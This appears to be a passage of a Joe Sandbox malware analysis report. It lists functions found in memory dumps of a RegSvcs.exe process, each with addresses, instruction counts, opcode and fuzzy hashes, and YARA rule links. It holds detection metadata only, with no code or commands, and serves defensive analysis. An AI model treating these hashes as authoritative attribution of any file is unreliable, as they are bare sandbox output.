Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a670e2110876fbf7d6402a8edc26daf48e3f338c3062d427d6586ba8f77d184
Instruction ID: 5e7f5e5b40d6c9d9d5eda669c7b144a654f481bb062a0f815fdf0ce0846308dd
Opcode Fuzzy Hash: 2a670e2110876fbf7d6402a8edc26daf48e3f338c3062d427d6586ba8f77d184
Instruction Fuzzy Hash: BB129A30B00714CFEB249F64D850A6EBBB2FF88305F10895DE5029F3A5CB75E9468B96

Function 061105DF Relevance: .4, Instructions: 428COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1543016939.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6110000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9000151d1a63825e8c80356923cca5dd236e11c2cebd1c3d178861d94c7e6dbd
Instruction ID: 4454387290eeb01c65d8664af7eaadee670c745f1879f6b97beb42cc5f4cda2a
Opcode Fuzzy Hash: 9000151d1a63825e8c80356923cca5dd236e11c2cebd1c3d178861d94c7e6dbd
Instruction Fuzzy Hash: EF029A30B00714CFEB64DF64D850A6EBBB2FF88305F108959E5028F3A5CB75E9468B96

Function 06110655 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1543016939.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6110000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84d77b16b3fd57b2a7851730993ea286183e84900d6734c42d692d4ea62517bc
Instruction ID: af89b495baf74944d545ee32cb79faa97503eb2e80dc2f62c987221f8e2ebac5
Opcode Fuzzy Hash: 84d77b16b3fd57b2a7851730993ea286183e84900d6734c42d692d4ea62517bc
Instruction Fuzzy Hash: 4EF1AB30B00614DFEB54DF64D850B6EBBB2FF88705F108559E5028F3A5CB75E9868B92

Function 061106CB Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1543016939.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6110000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e51fcfbcd648a58a4984054c50f0c5ac8471433c0aef4d3470cf8dccf1b8912
Instruction ID: b2aac1a0daa7409f75792fbcf993d6f791ca1d5da9ed67dc41e374ba24c95588
Opcode Fuzzy Hash: 8e51fcfbcd648a58a4984054c50f0c5ac8471433c0aef4d3470cf8dccf1b8912
Instruction Fuzzy Hash: 1CE18B30F00214DFEB54DF64D851B6EBBB2BF88705F148559E9028F3A5CB71E9868B92

Function 050DD793 Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e136c6fb1eb32edf3412b7be0dcb3c6f6cc35cae4a4f191f852e39177ba167b5
Instruction ID: 66c6aee45c931a87861a29d44c68d81c5683042d64aa3cb75f585ff156cd0c9c
Opcode Fuzzy Hash: e136c6fb1eb32edf3412b7be0dcb3c6f6cc35cae4a4f191f852e39177ba167b5
Instruction Fuzzy Hash: 0DE12630A00309CFDB14DFA4E498AADBBF2BF85315F548468E406AF365DB35AD86CB50

Function 06113138 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1543016939.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6110000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e9d580f80d81c20f4f7933744525f8487aa8c1fb68a7c1248d81ac2ae4c076c
Instruction ID: 3fc6da0906e93d0f474a635a3f7e2e104faee4a251b99d74fae81e2db6ad2f64
Opcode Fuzzy Hash: 8e9d580f80d81c20f4f7933744525f8487aa8c1fb68a7c1248d81ac2ae4c076c
Instruction Fuzzy Hash: DF917D34B502049FCB54DF69C894A9ABBF2FF89310B1580AAE915AF365DB31EC01CB61

Function 050DC840 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cb84d2b0e75a09dd9f14b882fcb138aae5f515a2f2e74296a0087ae275d6da0
Instruction ID: 045519a05f5c9b311eb64fa21fa6c67d58b9bdc6427ebfaf0a767a5a54df359a
Opcode Fuzzy Hash: 8cb84d2b0e75a09dd9f14b882fcb138aae5f515a2f2e74296a0087ae275d6da0
Instruction Fuzzy Hash: 12718074B003049FDB199B79A458A6EBBE7FFC8210B148469E806CB395DF34DC42C7A5

Function 06111308 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1543016939.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6110000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35112cc85cbaa9f106ad5a94f7a00f40e8017393eb5c00e22fb6d6f07c9c8922
Instruction ID: a46d2a4896b09f4e8165d1b9a08255d2b9b176653c796c9a412af580a16445ce
Opcode Fuzzy Hash: 35112cc85cbaa9f106ad5a94f7a00f40e8017393eb5c00e22fb6d6f07c9c8922
Instruction Fuzzy Hash: FB617B31B14704AFC764EB79D84156AFBF6EF81220714857BDA45CF605EB31C842C3A1

Function 050D71D5 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 450c78ad070e5f37572328182810d4c211accc6aa4c0548a9296f4e6cdc66db1
Instruction ID: 2aafe8f3857aff3975ff972e833e1d863ecda880cfc3ca0e2f8e94f7527230fb
Opcode Fuzzy Hash: 450c78ad070e5f37572328182810d4c211accc6aa4c0548a9296f4e6cdc66db1
Instruction Fuzzy Hash: 7761F535E043508FDB12EB78D8A07ED7FB2EF89215F14409BD441DB392DA34884ACB95

Function 050D5910 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d2b340c8890c988ef6bcda37ab5f6e99fe9ef3186f748b6effd0277f1fd89b9
Instruction ID: dd2657fd8e5ed5b2d3d512ec81524834efa6051ab3cd3577041be8f212062840
Opcode Fuzzy Hash: 3d2b340c8890c988ef6bcda37ab5f6e99fe9ef3186f748b6effd0277f1fd89b9
Instruction Fuzzy Hash: 24515C34B043148FDB54DB69D898BADBBF2BF89220F185469E806DB3A1DA34DC81CB50

Function 050DAD28 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ec63449fe2e09dc588f0a06d342b85f992c8c1c9b186eb82cca9a25f9d1d8ad
Instruction ID: a5bacbc1955a6c1232e7d4400c786ae4051c139fdb1ef6144f0b9d4031786750
Opcode Fuzzy Hash: 4ec63449fe2e09dc588f0a06d342b85f992c8c1c9b186eb82cca9a25f9d1d8ad
Instruction Fuzzy Hash: 2441B132B083148FD765CF29E454B6EF7E6EB852607148569E80ACB354DA36EC41C7A4

Function 050DB2C1 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b250dcb44e600d2cd5834850fc0ef9426c674c88b7b8198683307bb7f98120
Instruction ID: 44b2023751137779075d5130af91ec63b0744b5ccd5e22de9016f9eda447c2c3
Opcode Fuzzy Hash: 67b250dcb44e600d2cd5834850fc0ef9426c674c88b7b8198683307bb7f98120
Instruction Fuzzy Hash: 48512A74B006098FC754DF25E999A6EBBF3FF88711B158025E806C72A5DF34DD029B61

Function 050DD5B2 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 180e565a89777ed6d977a42fc275438c3adb4ae5508e6810efbf10834c8e69b4
Instruction ID: 9fab1a773dba695622486d039cf406edc8d42c6c740bbef5f1320dfdbbe98bb7
Opcode Fuzzy Hash: 180e565a89777ed6d977a42fc275438c3adb4ae5508e6810efbf10834c8e69b4
Instruction Fuzzy Hash: 37511A75A00308CFDB54DFA5E998AADBBF6FF48310F148469E806AB365DF309845DB90

Function 050D42F1 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6e84f1e4f4b4d3380faf7623d9f4e179a6b877a88a74c3c4f6b5e4643f9b5e0
Instruction ID: caf367ac3a74331d9c7b6a86295f5d2ee74317c5389a0f3e44c2dd783f89d0eb
Opcode Fuzzy Hash: d6e84f1e4f4b4d3380faf7623d9f4e179a6b877a88a74c3c4f6b5e4643f9b5e0
Instruction Fuzzy Hash: F541B130B003059FEB14DB79E884B6EBFE2FFC5214F14C469D5098B251EA70AD46CB91

Function 050DF5D8 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b50e6ddf7f2b8f0905c210e4b1dabd5c47558935828a447b659640667e995da
Instruction ID: 8d88a7a99534bda6cdd4c3117352b0cd672ad04a23cdc9cd086171e55651f092
Opcode Fuzzy Hash: 3b50e6ddf7f2b8f0905c210e4b1dabd5c47558935828a447b659640667e995da
Instruction Fuzzy Hash: A5413C78B002068FCB14DB64D899A6EBBF6FF88310F108559E8069B355DF35AD41CBA1

Function 050D6BB0 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eff4d3b74ffc160e70887a07215f90df6e768fe73f3bb2aa6e99358a5b1bfc9f
Instruction ID: 18810e35bdf7daee023e155e37e89a5ee7791a83dd715873b63bd2b76b59d2ea
Opcode Fuzzy Hash: eff4d3b74ffc160e70887a07215f90df6e768fe73f3bb2aa6e99358a5b1bfc9f
Instruction Fuzzy Hash: E341C231B442189FDB549B69E819BBE7BE6FF88310F144469E50AC7390DA72AC42CB91

Function 050D6D40 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 056867470dbea9e61b3f021867f8360e9afb7ecc313c3b424b10115263dd9c8e
Instruction ID: 41f7b24b647f85c17943e7b404d672aa18bac565a9b0dbc892206abde996897e
Opcode Fuzzy Hash: 056867470dbea9e61b3f021867f8360e9afb7ecc313c3b424b10115263dd9c8e
Instruction Fuzzy Hash: CC41B130F443159FEB18ABB8A42976EBBF2AF84300F1448A9D846D73D5DE349D41DB51

Function 050DF790 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f156e973fab8751464d13e3ecc3f41272245e63dd2ba22e3e70c392ac88595
Instruction ID: 765c11006fc0f3cdf1343be4c56537a3d5b557f4d06c8f9833149256c3a2a262
Opcode Fuzzy Hash: e5f156e973fab8751464d13e3ecc3f41272245e63dd2ba22e3e70c392ac88595
Instruction Fuzzy Hash: B8413875B002069FCB44DB65E99496EFBB6FF84311B14C069E90ADB394DF309941CBA1

Function 050D9C4A Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d5857c90fd090f45b5ccc300baf61c7034fffd79a747f53e1a1c498301fadcd
Instruction ID: ffb2dfee3b5431ca4fe0897cc8ba7c625a96cc14b8bb50ec2a64ce7d5f73ac60
Opcode Fuzzy Hash: 7d5857c90fd090f45b5ccc300baf61c7034fffd79a747f53e1a1c498301fadcd
Instruction Fuzzy Hash: A5512874A052958FCB49CF69C4C099ABFB1FF4920472486DADC448F30BD735EA4ACBA1

Function 050D5F37 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc2ba439dccc0d81746d35a3b91f8cfe20c9a0392f9b59422a9b9b427e5c282e
Instruction ID: e64f5c0354268dec9b72b8ab8abf8e25636247fd007f2514eb312ecd242eceba
Opcode Fuzzy Hash: fc2ba439dccc0d81746d35a3b91f8cfe20c9a0392f9b59422a9b9b427e5c282e
Instruction Fuzzy Hash: 82413834A44208CFDB44DFA8D958BADBBB2FF88304F148568E506AB375CB31AD52CB40

Function 050D9C58 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 087a69782d0555affac5f9beef79e0448acb756997343f55cf9d1856dd9b2b3a
Instruction ID: 6b5417d5a29419a78b201c78a411475b9f9eae7905e41f78c27d9fe52f2cee23
Opcode Fuzzy Hash: 087a69782d0555affac5f9beef79e0448acb756997343f55cf9d1856dd9b2b3a
Instruction Fuzzy Hash: 6C411A746052958FCB49CF68C4C089ABFB1FF4920472486DADC448F30BD735EA4ACBA1

Function 050D5900 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aba3869ee526435784859121ceefa5612de46dbe176234eb6136ebc9aa507993
Instruction ID: 1ce8afe2c80f7f6ad20ee502ed98187bb48b96a328fb1d889eef4d932b9d5132
Opcode Fuzzy Hash: aba3869ee526435784859121ceefa5612de46dbe176234eb6136ebc9aa507993
Instruction Fuzzy Hash: 63415A34A043449FDB54CB69D898AADBBF2FF4D320F185068E806AB360CB759C81CF60

Function 050DA9B0 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afe3e9347da6989df9b3d20ff442b6d7946b15655fde912affdebb80a80b7fbe
Instruction ID: fa5e8a75d0e1f7e7219f8d179fc5bc6c800a910ba9b32ab97089cdedfaa4fd9d
Opcode Fuzzy Hash: afe3e9347da6989df9b3d20ff442b6d7946b15655fde912affdebb80a80b7fbe
Instruction Fuzzy Hash: B1319F35B003558FDB249B79E85866EBBE6EFC8221B04857AD81AD7760DF30DC41C760

Function 050D93A0 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b651c9fb848e2adfd7027dc55e4547c6ccf0ad45cd4691d9b1a0ed50ccde40c4
Instruction ID: adbd0e21c666c455fece99fc4e73b19e5ee8e8e3a6edcbf14c288d4cbc91d711
Opcode Fuzzy Hash: b651c9fb848e2adfd7027dc55e4547c6ccf0ad45cd4691d9b1a0ed50ccde40c4
Instruction Fuzzy Hash: 2331D4367053508FC715DB75E094879FBE6FF8922175889AAE90AC7742CB31EC42CBA0

Function 050DEF18 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beee5d552610465505a753e3ae37ad5f25b751cd8dd9e384e9d9c0d29ca8370f
Instruction ID: 59eacaa50bcec321a09e158822c08705ebb634953b2ab32437682600c54a1ae5
Opcode Fuzzy Hash: beee5d552610465505a753e3ae37ad5f25b751cd8dd9e384e9d9c0d29ca8370f
Instruction Fuzzy Hash: 26210A35B143151FDB586679F40567EBBEEDBC5261B0840BAE909CB384DE35DC02C7A0

Function 050DF780 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae5a6f4558ebbb96304c8228180a0dce0590535f2990dbcbf5ca609e909360e1
Instruction ID: 4938276a8bef7e046b97f47708699a23280a00f1b4c51dc07bb0b6ea68c62443
Opcode Fuzzy Hash: ae5a6f4558ebbb96304c8228180a0dce0590535f2990dbcbf5ca609e909360e1
Instruction Fuzzy Hash: D6316974B002069FCB44DB65E594A6EBBF6BF88311B148069E80ADB364DF30ED41CBA1

Function 050DE300 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c546f2ba6aeba60cbda18ef009c85e37d6db3d189b414e1dd0954f8e4b01ecea
Instruction ID: 3c3908d8f7589f335b11cccefc972cc7b287eafaf75a6ff16cdc4e4dfcb9b72e
Opcode Fuzzy Hash: c546f2ba6aeba60cbda18ef009c85e37d6db3d189b414e1dd0954f8e4b01ecea
Instruction Fuzzy Hash: 34312D30E003498BDB64DF65E8587BEBBFAFF88314F108429D816AA250DB759945CBA0

Function 050DB570 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dbba2751e56a05e19fa0d49e045d3478431e8db16bfec4601d57bf186164ff3
Instruction ID: bb9996194d81ede1b664b696d36624183b01c9352e86d82b19a7b14546f5e38c
Opcode Fuzzy Hash: 6dbba2751e56a05e19fa0d49e045d3478431e8db16bfec4601d57bf186164ff3
Instruction Fuzzy Hash: 83311830710204CBDB14EB25D969AAEBBF6AF88741B1540AAE406DB3A0DF76DD01CF60

Function 050DB580 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c77916305185405d6e8d5895bf5bd1f525e5ff29831c4661054ce8b219a3ed
Instruction ID: 2712db0a02af602698da182744444c7bdd8d37f8173f4f2f08ada473d4bdb30b
Opcode Fuzzy Hash: c8c77916305185405d6e8d5895bf5bd1f525e5ff29831c4661054ce8b219a3ed
Instruction Fuzzy Hash: B9210A30714204CBDB14EB25D969AAEBBFAEF89741B1540A9E406DB3A0DF76DD01CF60

Function 00F1D054 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1536216143.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f1d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fae88d41317870bdea95797768b23ae57007160e28be450dafdbd3f7e403f4ce
Instruction ID: 182175c98ba7ba2820d5debae298367f5fd2c4f314b6ebe0c8b11e21a3e757e8
Opcode Fuzzy Hash: fae88d41317870bdea95797768b23ae57007160e28be450dafdbd3f7e403f4ce
Instruction Fuzzy Hash: E7210672904240EFDB15DF10D9C0B56BB75FB88324F24C669E9091B246C336D897EBA2

Function 050D7EE8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9382cfe750cdbbaf56885449c10f3fa49d363e9155e01a6e5b17ad8927fdb47
Instruction ID: 75d2e462e6c25f2552cc03d8a5010241b91c695057b2ac8d766cff878157dbec
Opcode Fuzzy Hash: e9382cfe750cdbbaf56885449c10f3fa49d363e9155e01a6e5b17ad8927fdb47
Instruction Fuzzy Hash: 19218E747002169FDB24DF65E899B6EFBE6FF84750B048469E806DB761CB30D802CBA0

Function 00F2D2F4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1536343483.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f2d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0dee42afaaee6ca491577a5f193cc7dcb8788f8106d248ecc3c056d91cccbe3
Instruction ID: b9897b77b37c277acfcae7dffae9051c85a63ba0644538c783e555e0f611af40
Opcode Fuzzy Hash: e0dee42afaaee6ca491577a5f193cc7dcb8788f8106d248ecc3c056d91cccbe3
Instruction Fuzzy Hash: 4F21F676A04244DFDB14DF14E9C4B1ABB65FB84324F24C569D8494B286C33ADC46EAA3

Function 00F2D4A4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1536343483.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f2d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83d4a3228e27936df00ac2368e85fcd0cfacc807a3599bcd22ec3bab3d33774f
Instruction ID: dbd2b39bc2a8165897220b6bdac9b8b8d81b73a990fd179b790ec004da437467
Opcode Fuzzy Hash: 83d4a3228e27936df00ac2368e85fcd0cfacc807a3599bcd22ec3bab3d33774f
Instruction Fuzzy Hash: AD210775A04204DFDB04DF14E9C4B15BB65FB84328F24C56DD8494B292C776D846DA62

Function 050D4210 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb2770cd917b88c8235d54e5502cceb82664d796f79913ed27b2c720943cbf5
Instruction ID: f0b1eab688469ff77538a514553c0c1c03d94a9c6abd5086b7f24c8be8c26531
Opcode Fuzzy Hash: 0eb2770cd917b88c8235d54e5502cceb82664d796f79913ed27b2c720943cbf5
Instruction Fuzzy Hash: C021AC30A443449FCB15EB74E869A6DBBB2FF85310F4484A9D44ACB392CB349C02CB51

Function 050DF8D0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8b42d7960a7943b493d92744c235321c34e52a8ff0de94f24fc6330768151c7
Instruction ID: fe42bf7a1156cb55ae9c793c8cce399166e00e748b1c6c0858ec71ac25ac9c27
Opcode Fuzzy Hash: e8b42d7960a7943b493d92744c235321c34e52a8ff0de94f24fc6330768151c7
Instruction Fuzzy Hash: 1221D574B002055BDB14EBA5D881BAEBBF6EFC8310F408418E109AB340DF31AE0697A5

Function 050DD090 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca3bc3825c9e05b7f3e852adbe1568049e55814cf4fd2c1417f3626f56304c69
Instruction ID: 7b5250980a3cefdfd281f3f1d0fc4406819a3f3433f1fcf6e33824e72a5d0651
Opcode Fuzzy Hash: ca3bc3825c9e05b7f3e852adbe1568049e55814cf4fd2c1417f3626f56304c69
Instruction Fuzzy Hash: 3F110476B083158FCB199B79F81453EBBEAEFC8225314497DE91AC7740EE318C028790

Function 050D7AB1 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f79481afb1b607ef43fb01dafcddebe55ee03ac36588b8c47e129798e6456bb
Instruction ID: b75e9e30a0e764ab8367c92ab6e5e020c0f97c89cbad5dc013c0bd16cd1ec713
Opcode Fuzzy Hash: 0f79481afb1b607ef43fb01dafcddebe55ee03ac36588b8c47e129798e6456bb
Instruction Fuzzy Hash: CA21CF30A04300CFC7159B25D454B6EBBB2FF85311F24886ED44A9B392CB35A842CB51

Function 050DF8E0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
